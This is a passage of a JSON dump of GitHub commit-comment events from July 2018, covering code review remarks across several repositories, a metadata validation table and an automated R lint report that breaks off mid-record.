{"id":"8023559826","type":"CommitCommentEvent","actor":{"login":"tonyr729"},"repo":{"name":"tonyr729/weathrly"},"payload":{"comment":{"id":29845922,"position":4,"line":35,"path":"README.md","commit_id":"086322132dd5ad8cedbbe6e92492a768c8f41463","created_at":"2018-07-26T15:40:59Z","updated_at":"2018-07-26T15:40:59Z","author_association":"OWNER","body":"@danielafcarey"}},"created_at":"2018-07-26T15:40:59Z"}
{"id":"8023560793","type":"CommitCommentEvent","actor":{"login":"dwalke44"},"repo":{"name":"dwalke44/EastMauiClean"},"payload":{"comment":{"id":29845925,"position":null,"line":null,"path":null,"commit_id":"aa46a206d0ee08f415597aa8291df9af52e2b562","created_at":"2018-07-26T15:41:09Z","updated_at":"2018-07-26T15:41:09Z","author_association":"OWNER","body":"Instructions for download"}},"created_at":"2018-07-26T15:41:09Z"}
{"id":"8023560883","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"iweiss/wildfly"},"payload":{"comment":{"id":29845926,"position":47,"line":159,"path":"jsf/subsystem/src/main/java/org/jboss/as/jsf/deployment/JSFDependencyProcessor.java","commit_id":"343d4cc3bac704746f9a43170a1e28a96228d9f1","created_at":"2018-07-26T15:41:10Z","updated_at":"2018-07-26T15:41:10Z","author_association":"NONE","body":"Is this class also present in JSF 2.0.x, JSF 2.1.x, and JSF 2.2.x? It looks like it was introduced in JSF 2.3."}},"created_at":"2018-07-26T15:41:10Z"}
{"id":"8023561008","type":"CommitCommentEvent","actor":{"login":"RainbowMiner"},"repo":{"name":"RainbowMiner/RainbowMiner"},"payload":{"comment":{"id":29845927,"position":null,"line":null,"path":null,"commit_id":"c1d8ad78a9d30450ce48be2949037d382b8c884a","created_at":"2018-07-26T15:41:11Z","updated_at":"2018-07-26T15:41:11Z","author_association":"OWNER","body":"@pinpins I added the new Equihash-Variant \"Safecoin\". Could you double-check if the miners --pers Safecoin is correct?"}},"created_at":"2018-07-26T15:41:11Z"}
{"id":"8023568480","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29845938,"position":47,"line":62,"path":"Source/Foundation/bsfEngine/GUI/BsGUIContent.h","commit_id":"395ad51f94b0f55484f2be90028dd0dfca3d1bb8","created_at":"2018-07-26T15:42:24Z","updated_at":"2018-07-26T15:42:24Z","author_association":"CONTRIBUTOR","body":"Indeed. It's still lacking move constructor and ass. operator. I'll get around to that."}},"created_at":"2018-07-26T15:42:24Z"}
{"id":"8023570353","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29845942,"position":30,"line":110,"path":"oauth2/oauth2-resource-server/src/main/java/org/springframework/security/oauth2/server/resource/authentication/JwtAuthenticationProvider.java","commit_id":"2ac05860658e81f01a3d73e3d07d17f24b7b7a19","created_at":"2018-07-26T15:42:42Z","updated_at":"2018-07-26T15:42:42Z","author_association":"OWNER","body":"While I like the stronger type in the Result class, it has this unfortunate plumbing consequence that we are simply pulling the description out of each one and rolling it into another OAuth2Error."}},"created_at":"2018-07-26T15:42:42Z"}
{"id":"8023570493","type":"CommitCommentEvent","actor":{"login":"NathanWolf"},"repo":{"name":"marcelo-mason/PreciousStones"},"payload":{"comment":{"id":29845943,"position":21,"line":683,"path":"src/main/java/net/sacredlabyrinth/Phaed/PreciousStones/managers/ForceFieldManager.java","commit_id":"bc38ccea64f75dfb9ff5cc5e4d95ea1e4fdf0bf6","created_at":"2018-07-26T15:42:44Z","updated_at":"2018-07-26T15:42:44Z","author_association":"CONTRIBUTOR","body":"Hey there, it's been a while! I know this is ancient history, but I'm wondering if we could put the getAllPlayerFields method back in? Or if there is some other way to get all fields for a player now?"}},"created_at":"2018-07-26T15:42:44Z"}
{"id":"8023572247","type":"CommitCommentEvent","actor":{"login":"danielafcarey"},"repo":{"name":"tonyr729/weathrly"},"payload":{"comment":{"id":29845946,"position":null,"line":null,"path":null,"commit_id":"086322132dd5ad8cedbbe6e92492a768c8f41463","created_at":"2018-07-26T15:43:00Z","updated_at":"2018-07-26T15:43:00Z","author_association":"NONE","body":"Good add - thanks for doing this!"}},"created_at":"2018-07-26T15:43:00Z"}
{"id":"8023572480","type":"CommitCommentEvent","actor":{"login":"cppwfs"},"repo":{"name":"markpollack/spring-cloud-dataflow"},"payload":{"comment":{"id":29845947,"position":78,"line":156,"path":"spring-cloud-dataflow-docs/src/main/asciidoc/task-developer-guide.adoc","commit_id":"7ec3cd5066886330c06f931ef1e413813c537a1b","created_at":"2018-07-26T15:43:03Z","updated_at":"2018-07-26T15:43:03Z","author_association":"NONE","body":"This section needs to stay else the user will not be able to see the Task Logs we enumerate below:"}},"created_at":"2018-07-26T15:43:03Z"}
{"id":"8023573195","type":"CommitCommentEvent","actor":{"login":"GTpete"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29845949,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-26T15:43:10Z","updated_at":"2018-07-26T15:43:10Z","author_association":"NONE","body":"Good project"}},"created_at":"2018-07-26T15:43:10Z"}
{"id":"8023573946","type":"CommitCommentEvent","actor":{"login":"tb"},"repo":{"name":"Selleo/website"},"payload":{"comment":{"id":29845950,"position":null,"line":null,"path":null,"commit_id":"5b29d39f4495e295b731a40c5e9a27f4945eb594","created_at":"2018-07-26T15:43:16Z","updated_at":"2018-07-26T15:43:16Z","author_association":"MEMBER","body":"@ArekJanik Przeggldnij prosze czy dobrze zrobilem ten spacing ;-)"}},"created_at":"2018-07-26T15:43:16Z"}
{"id":"8023574192","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29845951,"position":null,"line":null,"path":null,"commit_id":"f2b5b5e35c1e8fbd11763339fb7d8757ba8724d3","created_at":"2018-07-26T15:43:19Z","updated_at":"2018-07-26T15:43:19Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     1.48 |\n| `metadata_passing` |    61    |\n| `metadata_total`   |    62    |\n\n## Units\n\n| Changed                             | Status   |\n|:------------------------------------|:---------|\n| `./data/tlg0014/tlg001/__cts__.xml` | New      |\n| `./data/tlg0014/tlg002/__cts__.xml` | New      |\n| `./data/tlg0014/tlg003/__cts__.xml` | New      |\n| `./data/tlg0014/tlg005/__cts__.xml` | New      |\n| `./data/tlg0014/tlg006/__cts__.xml` | New      |\n| `./data/tlg0014/tlg007/__cts__.xml` | New      |\n| `./data/tlg0014/tlg008/__cts__.xml` | New      |\n| `./data/tlg0014/tlg009/__cts__.xml` | New      |\n| `./data/tlg0014/tlg010/__cts__.xml` | New      |\n| `./data/tlg0014/tlg011/__cts__.xml` | New      |\n| `./data/tlg0014/tlg012/__cts__.xml` | New      |\n| `./data/tlg0014/tlg013/__cts__.xml` | New      |\n| `./data/tlg0014/tlg014/__cts__.xml` | New      |\n| `./data/tlg0014/tlg015/__cts__.xml` | New      |\n| `./data/tlg0014/tlg016/__cts__.xml` | New      |\n| `./data/tlg0014/tlg017/__cts__.xml` | New      |\n| `./data/tlg0014/tlg018/__cts__.xml` | New      |\n| `./data/tlg0014/tlg019/__cts__.xml` | New      |\n| `./data/tlg0014/tlg020/__cts__.xml` | New      |\n| `./data/tlg0014/tlg021/__cts__.xml` | New      |\n| `./data/tlg0014/tlg022/__cts__.xml` | New      |\n| `./data/tlg0014/tlg023/__cts__.xml` | New      |\n| `./data/tlg0014/tlg024/__cts__.xml` | New      |\n| `./data/tlg0014/tlg025/__cts__.xml` | New      |\n| `./data/tlg0014/tlg026/__cts__.xml` | New      |\n| `./data/tlg0014/tlg027/__cts__.xml` | New      |\n| `./data/tlg0014/tlg028/__cts__.xml` | New      |\n| `./data/tlg0014/tlg029/__cts__.xml` | New      |\n| `./data/tlg0014/tlg030/__cts__.xml` | New      |\n| `./data/tlg0014/tlg031/__cts__.xml` | New      |\n| `./data/tlg0014/tlg032/__cts__.xml` | New      |\n| `./data/tlg0014/tlg033/__cts__.xml` | New      |\n| `./data/tlg0014/tlg034/__cts__.xml` | New      |\n| `./data/tlg0014/tlg035/__cts__.xml` | New      |\n| `./data/tlg0014/tlg036/__cts__.xml` | New      |\n| `./data/tlg0014/tlg037/__cts__.xml` | New      |\n| `./data/tlg0014/tlg038/__cts__.xml` | New      |\n| `./data/tlg0014/tlg039/__cts__.xml` | New      |\n| `./data/tlg0014/tlg040/__cts__.xml` | New      |\n| `./data/tlg0014/tlg041/__cts__.xml` | New      |\n| `./data/tlg0014/tlg042/__cts__.xml` | New      |\n| `./data/tlg0014/tlg043/__cts__.xml` | New      |\n| `./data/tlg0014/tlg044/__cts__.xml` | New      |\n| `./data/tlg0014/tlg045/__cts__.xml` | New      |\n| `./data/tlg0014/tlg046/__cts__.xml` | New      |\n| `./data/tlg0014/tlg047/__cts__.xml` | New      |\n| `./data/tlg0014/tlg048/__cts__.xml` | New      |\n| `./data/tlg0014/tlg049/__cts__.xml` | New      |\n| `./data/tlg0014/tlg050/__cts__.xml` | New      |\n| `./data/tlg0014/tlg051/__cts__.xml` | New      |\n| `./data/tlg0014/tlg052/__cts__.xml` | New      |\n| `./data/tlg0014/tlg053/__cts__.xml` | New      |\n| `./data/tlg0014/tlg054/__cts__.xml` | New      |\n| `./data/tlg0014/tlg055/__cts__.xml` | New      |\n| `./data/tlg0014/tlg056/__cts__.xml` | New      |\n| `./data/tlg0014/tlg057/__cts__.xml` | New      |\n| `./data/tlg0014/tlg058/__cts__.xml` | New      |\n| `./data/tlg0014/tlg059/__cts__.xml` | New      |\n| `./data/tlg0014/tlg060/__cts__.xml` | New      |\n| `./data/tlg0014/tlg061/__cts__.xml` | New      |\n| `./data/tlg0014/tlg062/__cts__.xml` | New      |\n| `./data/tlg0014/tlg063/__cts__.xml` | New      |\n| `./data/tlg0014/tlg001/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg002/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg003/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg005/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg006/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg007/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg008/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg009/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg010/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg011/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg012/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg013/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg014/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg015/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg016/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg017/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg018/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg019/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg020/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg021/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg022/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg023/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg024/__cts__.xml` | Failing  |\n| `./data/tlg0014/tlg025/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg026/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg027/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg028/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg029/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg030/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg031/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg032/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg033/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg034/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg035/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg036/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg037/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg038/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg039/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg040/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg041/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg042/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg043/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg044/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg045/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg046/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg047/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg048/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg049/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg050/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg051/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg052/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg053/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg054/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg055/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg056/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg057/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg058/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg059/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg060/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg061/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg062/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg063/__cts__.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4492)*\n"}},"created_at":"2018-07-26T15:43:19Z"}
{"id":"8023576310","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29845953,"position":42,"line":66,"path":"oauth2/oauth2-resource-server/src/main/java/org/springframework/security/oauth2/server/resource/authentication/DefaultJwtValidator.java","commit_id":"2ac05860658e81f01a3d73e3d07d17f24b7b7a19","created_at":"2018-07-26T15:43:40Z","updated_at":"2018-07-26T15:43:40Z","author_association":"OWNER","body":"A builder makes sense in validators that do have more than one check. Need to still think about a simple way to just specify one error, hopefully without engaging the builder at all."}},"created_at":"2018-07-26T15:43:40Z"}
{"id":"8023577228","type":"CommitCommentEvent","actor":{"login":"ad3n"},"repo":{"name":"nafiesl/free-pmo"},"payload":{"comment":{"id":29845956,"position":18,"line":49,"path":"app/Http/Controllers/Invoices/ItemsController.php","commit_id":"8ba3e9f79327d88770dd1dffa9dd10a96c7277d8","created_at":"2018-07-26T15:43:48Z","updated_at":"2018-07-26T15:43:48Z","author_association":"NONE","body":"Ini yakin amount pakai integer bukan float?"}},"created_at":"2018-07-26T15:43:48Z"}
{"id":"8023579708","type":"CommitCommentEvent","actor":{"login":"ad3n"},"repo":{"name":"nafiesl/free-pmo"},"payload":{"comment":{"id":29845962,"position":5,"line":23,"path":"app/Http/Controllers/Invoices/ItemsController.php","commit_id":"8ba3e9f79327d88770dd1dffa9dd10a96c7277d8","created_at":"2018-07-26T15:44:14Z","updated_at":"2018-07-26T15:44:14Z","author_association":"NONE","body":"Ini juga sama, yakin pakai integer?"}},"created_at":"2018-07-26T15:44:14Z"}
{"id":"8023579982","type":"CommitCommentEvent","actor":{"login":"jcorvinus"},"repo":{"name":"sonicretro/sa_tools"},"payload":{"comment":{"id":29845963,"position":16,"line":73,"path":"SALVL/MainForm.cs","commit_id":"42cab37646bbf8b52cfdd5221b807e31fc4e491d","created_at":"2018-07-26T15:44:16Z","updated_at":"2018-07-26T15:44:16Z","author_association":"CONTRIBUTOR","body":"Oh, cool. Thanks for the tip. I'll get to it soon-ish"}},"created_at":"2018-07-26T15:44:16Z"}
{"id":"8023580777","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29845966,"position":null,"line":null,"path":null,"commit_id":"9711d8657108344f74e09345f6976898a54da6d6","created_at":"2018-07-26T15:44:24Z","updated_at":"2018-07-26T15:44:24Z","author_association":"NONE","body":"[R/berekenLSVIbasis.R:172:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/berekenLSVIbasis.R#L172) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>        by = c(\"ID\", \"Criterium\", \"Indicator\", \"Voorwaarde.lower\" = \"Voorwaarde\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:119:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/invoercontroleData_soortenKenmerken.R#L119) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:44:11:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/invoercontroleData_voorwaarden.R#L44) *warning:* **local variable 'z' assigned but may not be used**\n```r\n<U+200B>          z <- tolower(x)\n          ^\n```\n[R/invoercontroleData_voorwaarden.R:62:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/invoercontroleData_voorwaarden.R#L62) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:63:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/invoercontroleData_voorwaarden.R#L63) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_1_databank.R:38:15:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/inst/tests/testthat/test_1_databank.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        ) %in% \n              ^\n```\n[inst/tests/testthat/test_1_databank.R:475:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/inst/tests/testthat/test_1_databank.R#L475) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_1_databank.R:476:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/inst/tests/testthat/test_1_databank.R#L476) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:555:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/inst/tests/testthat/test_berekenLSVIbasis.R#L555) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:556:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/inst/tests/testthat/test_berekenLSVIbasis.R#L556) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt 